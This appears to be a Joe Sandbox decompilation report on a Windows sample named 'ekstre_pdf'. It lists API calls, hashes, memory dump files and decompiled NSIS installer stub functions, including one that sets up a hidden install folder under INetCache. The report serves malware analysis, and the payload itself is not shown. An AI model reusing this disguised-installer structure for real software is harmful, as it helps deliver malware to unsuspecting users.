0x00404449
0x00404456
0x0040445c
0x0040445c
0x00000000
0x00403fe5
0x00403fea
0x00403ff6
0x00403fff
0x00404100
0x00000000
0x0040401e
0x00404021
0x00000000
0x00404021
0x00403fff
0x00403fe3

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
ShowWindow.USER32(?), ref: 00403FF6
GetWindowLongW.USER32(?,000000F0), ref: 00404008
ShowWindow.USER32(?,00000004), ref: 00404021
DestroyWindow.USER32 ref: 00404035
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
GetDlgItem.USER32(?,?), ref: 0040406D
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
IsWindowEnabled.USER32(00000000), ref: 00404088
GetDlgItem.USER32(?,?), ref: 00404133
GetDlgItem.USER32(?,00000002), ref: 0040413D
SetClassLongW.USER32(?,000000F2,?), ref: 00404157
SendMessageW.USER32(0000040F,00000000,?,?), ref: 004041A8
GetDlgItem.USER32(?,00000003), ref: 0040424E
ShowWindow.USER32(00000000,?), ref: 0040426F
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
EnableWindow.USER32(?,?), ref: 0040429C
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004042B2
EnableMenuItem.USER32(00000000), ref: 004042B9
SendMessageW.USER32(?,000000F4,00000000,?), ref: 004042D1
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
lstrlenW.KERNEL32(00450268,?,00450268,00000000), ref: 0040430E
SetWindowTextW.USER32(?,00450268), ref: 00404322
ShowWindow.USER32(?,0000000A), ref: 00404456

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: adfbcf4f330d89bd9ce8fe8eb8576293f16eb7f13e8472e69a26b2251cf6f138
Instruction ID: fa8f3a7c994c43a35980ead22a59ae97c2491be0dca901316ea0c8f74bba13fd
Opcode Fuzzy Hash: adfbcf4f330d89bd9ce8fe8eb8576293f16eb7f13e8472e69a26b2251cf6f138
Instruction Fuzzy Hash: D1C1C2B1500304ABDB20AF61EE89E2B3A68FB85745F00053EF745B51F1CBB95891DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEC Relevance: 40.5, APIs: 13, Strings: 10, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403BEC(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x47af10;
				_t22 = E0040690A(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x450268;
					 *0x4dc000 = 0x30;
					 *0x4dc002 = 0x78;
					 *0x4dc004 = 0;
					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x450268, 0);
					__eflags =  *0x450268;
					if(__eflags == 0) {
						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x450268, 0);
					}
					lstrcatW(0x4dc000, _t76);
				} else {
					E00406484(0x4dc000,  *_t22() & 0x0000ffff);
				}
				E00403EC2(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Dialectical\\Kombinationsuddannelserne\\Chronogramme";
				 *0x47af80 =  *0x47af18 & 0x00000020;
				 *0x47af9c = 0x10000;
				if(E00405F14(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Dialectical\\Kombinationsuddannelserne\\Chronogramme") != 0) {
					L16:
					if(E00405F14(_t98, _t86) == 0) {
						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x47af00, 0x67, "true", 0, 0, 0x8040); // executed
					 *0x472ee8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EC2(_t78, __eflags);
							__eflags =  *0x47afa0;
							if( *0x47afa0 != 0) {
								_t33 = E00405672(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B("true");
									goto L33;
								}
								__eflags =  *0x472ecc;
								if( *0x472ecc == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x450248, 5); // executed
							_t39 = E0040689A("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040689A("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x472ea0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x472ea0);
								 *0x472ec4 = _t87;
								RegisterClassW(0x472ea0);
							}
							_t44 = DialogBoxParamW( *0x47af00,  *0x472ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
							E00403B3C(E0040140B(5), "true");
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x47af00;
						 *0x472ea4 = E00401000;
						 *0x472eb0 =  *0x47af00;
						 *0x472eb4 = _t30;
						 *0x472ec4 = 0x40a380;
						if(RegisterClassW(0x472ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x450248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x47af00, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x46aea0;
					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x47af38 + _t78 * 2,  *0x47af38 +  *(_t82 + 0x4c) * 2, 0x46aea0, 0);
					_t63 =  *0x46aea0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x46aea2;
						 *((short*)(E00405E39(0x46aea2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653D(_t86, E00405E0C(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E58(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403bf2
0x00403bfb
0x00403c02
0x00403c04
0x00403c18
0x00403c2a
0x00403c33
0x00403c3c
0x00403c43
0x00403c48
0x00403c4f
0x00403c62
0x00403c62
0x00403c6d
0x00403c06
0x00403c11
0x00403c11
0x00403c72
0x00403c7c
0x00403c85
0x00403c8a
0x00403c9b
0x00403d2d
0x00403d35
0x00403d3e
0x00403d3e
0x00403d54
0x00403d5a
0x00403d68
0x00403de9
0x00403df1
0x00403dfb
0x00403e00
0x00403e06
0x00403e90
0x00403e95
0x00403e97
0x00403eb3
0x00000000
0x00403eb3
0x00403e99
0x00403e9f
0x00403ea7
0x00403ea7
0x00000000
0x00403e9f
0x00403e14
0x00403e1f
0x00403e24
0x00403e26
0x00403e2d
0x00403e2d
0x00403e38
0x00403e40
0x00403e42
0x00403e44
0x00403e4d
0x00403e50
0x00403e56
0x00403e56
0x00403e75
0x00403e86
0x00000000
0x00403e8b
0x00403df3
0x00403df5
0x00000000
0x00403d6a
0x00403d6a
0x00403d76
0x00403d80
0x00403d86
0x00403d8b
0x00403d9a
0x00403eb8
0x00403eb8
0x00000000
0x00403eb8
0x00403da9
0x00403de4
0x00000000
0x00403de4
0x00403ca1
0x00403ca1
0x00403ca4
0x00403ca6
0x00000000
0x00000000
0x00403cb4
0x00403cc6
0x00403ccb
0x00403cd4
0x00000000
0x00000000
0x00403cda
0x00403cdc
0x00403ce9
0x00403ce9
0x00403cf2
0x00403cf8
0x00403d20
0x00403d28
0x00000000
0x00403d0a
0x00403d0b
0x00403d14
0x00403d1a
0x00403d1b
0x00000000
0x00403d1b
0x00403d16
0x00403d18
0x00000000
0x00000000
0x00000000
0x00403d18
0x00403cf8

APIs

Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937

lstrcatW.KERNEL32(004DC000,00450268), ref: 00403C6D
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme,004DC000,00450268,80000001,Control Panel\Desktop\ResourceLocale,00000000,00450268,00000000,00000002,759D3420), ref: 00403CED
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme,004DC000,00450268,80000001,Control Panel\Desktop\ResourceLocale,00000000,00450268,00000000), ref: 00403D00
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme), ref: 00403D54

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

RegisterClassW.USER32(00472EA0), ref: 00403D91
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
GetClassInfoW.USER32(00000000,RichEdit20W,00472EA0), ref: 00403E40
GetClassInfoW.USER32(00000000,RichEdit,00472EA0), ref: 00403E4D
RegisterClassW.USER32(00472EA0), ref: 00403E56
DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75

Strings

RichEdit20W, xrefs: 00403E38, 00403E3E
RichEd20, xrefs: 00403E1A
.DEFAULT\Control Panel\International, xrefs: 00403C58
_Nb, xrefs: 00403D70, 00403DD8
RichEd32, xrefs: 00403E28
Control Panel\Desktop\ResourceLocale, xrefs: 00403C20
.exe, xrefs: 00403CFA
RichEdit, xrefs: 00403E47
Call, xrefs: 00403CB4, 00403CBD, 00403CCB, 00403D1A, 00403D20
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme, xrefs: 00403C7C, 00403C84, 00403D27, 00403D2D, 00403D3D

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1746554728
Opcode ID: 3691b0e4e490d94ac66d380781c0c3f3e856ccbc6e80efda4df7971671b6b830
Instruction ID: b13732347be0e3783dc71baf8a9194482fb08ddcb86c99fb083235b4149c8284
Opcode Fuzzy Hash: 3691b0e4e490d94ac66d380781c0c3f3e856ccbc6e80efda4df7971671b6b830
Instruction Fuzzy Hash: 9D61B570140300BED721AF66ED49F2B3A6CEB84B4AF00453FF945B22E2DB795951CA6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040657A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x472edc - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x47af38 + _t44 * 2;
				_t45 = 0x46aea0;
				_t108 = 0x46aea0;
				if(_a4 >= 0x46aea0 && _a4 - 0x46aea0 >> 1 < 0x4000) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040653D(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x4000) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x46aea0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xe) + 0x47c000;
								E0040653D(_t108, (_t78 << 0xe) + 0x47c000);
							} else {
								E00406484(_t108,  *0x47af08);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067C4(_t108);
							}
							goto L38;
						}
						if( *0x47af84 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x2000);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x47af04;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x47af08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x47af08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108); // executed
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x2000);
							goto L26;
						} else {
							E0040640B( *0x47af38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x47af38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E0040657A(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x0040657a
0x0040657a
0x0040657a
0x00406580
0x00406585
0x00406596
0x00406596
0x0040659e
0x0040659f
0x004065a0
0x004065a1
0x004065a4
0x004065ac
0x004065ae
0x004065bf
0x004065c2
0x004065c2
0x004065c6
0x004065cc
0x004065cf
0x004067aa
0x004067aa
0x004067b5
0x004067c1
0x004067c1
0x00000000
0x004065d5
0x004065da
0x004065ef
0x004065f0
0x004065f6
0x00406788
0x00406796
0x00406799
0x00406799
0x0040678a
0x0040678d
0x00406790
0x00406792
0x00406792
0x0040679b
0x0040679b
0x004067a1
0x004067a4
0x004065d7
0x00000000
0x004065d7
0x00000000
0x004067a4
0x004065fc
0x004065ff
0x0040660e
0x00406615
0x00406621
0x00406624
0x00406627
0x00406628
0x0040662d
0x00406633
0x00406636
0x00406639
0x0040672c
0x00406731
0x00406764
0x00406769
0x0040676e
0x00406773
0x00406773
0x00406778
0x0040677e
0x00406781
0x00000000
0x00406781
0x00406733
0x00406736
0x00406739
0x0040674e
0x00406755
0x0040673b
0x00406742
0x00406742
0x0040675d
0x00406760
0x00406724
0x00406725
0x00406725
0x00000000
0x00406760
0x00406646
0x0040664a
0x0040664a
0x0040664b
0x0040664d
0x0040668a
0x0040668d
0x0040669d
0x004066a0
0x004066a8
0x004066ae
0x004066ae
0x00406709
0x00406709
0x0040670b
0x00000000
0x00000000
0x004066b2
0x004066b7
0x004066b8
0x004066ba
0x004066d1
0x004066df
0x004066e5
0x004066e7
0x00406705
0x00406705
0x00406705
0x00000000
0x00406705
0x004066ed
0x004066f6
0x004066f9
0x004066ff
0x00406703
0x00000000
0x00000000
0x00000000
0x00406703
0x004066cb
0x004066cd
0x004066cf
0x00000000
0x00000000
0x00000000
0x004066cf
0x00000000
0x00406709
0x00406695
0x00000000
0x0040664f
0x0040666d
0x00406676
0x00406713
0x00406717
0x0040671f
0x0040671f
0x00000000
0x00406717
0x00406680
0x0040670d
0x00406711
0x00000000
0x00000000
0x00000000
0x00406711
0x0040664d
0x00000000
0x004065da

APIs

GetSystemDirectoryW.KERNEL32(Call,00002000), ref: 00406695
GetWindowsDirectoryW.KERNEL32(Call,00002000,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,00000000,00000000,004343DD,759D23A0), ref: 004066A8
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,00000000), ref: 00406779

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll, xrefs: 0040659F
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406663
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406719
Call, xrefs: 004065A4, 00406657, 0040665E, 00406662, 0040667F, 00406694, 004066A7, 004066BC, 004066E9, 0040671E, 00406724, 00406741, 00406754, 00406772, 00406778, 00406781, 004067B7

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-3301052816
Opcode ID: e94d8d706dcd629a512babf39b76b6dd195e4d6b0fe7efb8ab192d6d2aa38c4c
Instruction ID: 5def877fe3b5936a67970ad7b9743998d7a1d5ecf7b2376b18f84f047e5df604
Opcode Fuzzy Hash: e94d8d706dcd629a512babf39b76b6dd195e4d6b0fe7efb8ab192d6d2aa38c4c
Instruction Fuzzy Hash: 4761E371900205EADB209F64DD80BAE37A5EF44318F22813BE907B72D0D77D49A1CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x47af0c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x4e8000, 0x2000);
				_t89 = E0040602D(0x4e8000, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040653D(0x4d8000, 0x4e8000);
				E0040653D(0x4ec000, E00405E58(0x4d8000));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x43c224 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019("true");
					__eflags =  *0x47af14 - _t82;
					if( *0x47af14 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40387d
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034E5( *0x47af14 + 0x1c);
						_t35 =  &_v24; // 0x40387d
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x47af10 = _t94;
							 *0x47af18 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x47af1c =  *0x47af1c + 1;
								__eflags =  *0x47af1c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, "true"); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FE8(0x47af20, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004034E5( *0x430218);
					_t65 = E004034CF( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x47af14) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004034CF(0x428218, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00403019("true");
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x47af14;
						if( *0x47af14 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FE8( &_v44, 0x428218, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x430218; // 0x4b409
						 *0x47afa0 =  *0x47afa0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x47af14 = _t87;
